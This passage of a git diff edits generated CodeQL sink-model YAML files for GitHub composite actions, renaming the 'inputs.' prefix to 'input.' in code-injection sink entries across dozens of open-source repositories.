["ionic-team/ionic-framework", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.preid", "code-injection", "generated"] + - 
["ionic-team/ionic-framework", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 610016200174..0dc57625890c 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index 1d30610cfd12..c6fc16750f8b 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 867dc33f4321..0cbbd38d4280 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file + - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 87b014cbdd62..acc6cb91c076 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index f1b5e6df222e..c59e989db046 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml 
@@ -3,23 +3,23 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-packaging", 
"code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f952bd1da93c..b426dfb250da 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file + - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 977662bfa655..4a0c3c2d30f5 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file + - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_total_size", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 4c6c92fdefda..74d0ef69f753 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 45c2c1d780a9..ac8762d24eab 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 1edfbfc94328..6df9a160ec5d 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file + - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 658283336bd7..0c2793028a0a 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index d00b30874cce..f5bdc3d4bcc9 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 94ece1a58a0e..161022b8cbea 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 46d5a4383f44..391b19170293 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 5627a31bd904..3a45707d59ef 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] - - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index 98d2d8bcbf7f..c2e3608f7458 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] - - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file + - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 57fb2e710642..9b8e9d1e7ed4 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file + - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 8a216b97e1e3..954f2c346615 100644 
--- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file + - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 735413808ec8..31cb8acad9e5 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file + - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 54334359d0e9..4c8df154d8e6 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] - - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file + - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "input.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 67826ea9c0f8..8366d5119aea 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] - - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file + - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_compiling", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index d05404147023..a5d99cfc5e0f 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file + - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 9020a979bbb0..e07d26e6a5f2 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file + - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 91c84fda1d18..3fe7b27d9d53 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file + - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 5031ff1e4ca5..664c28bfc553 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file + - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index fc3a7ebe253b..7b90ed202348 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", 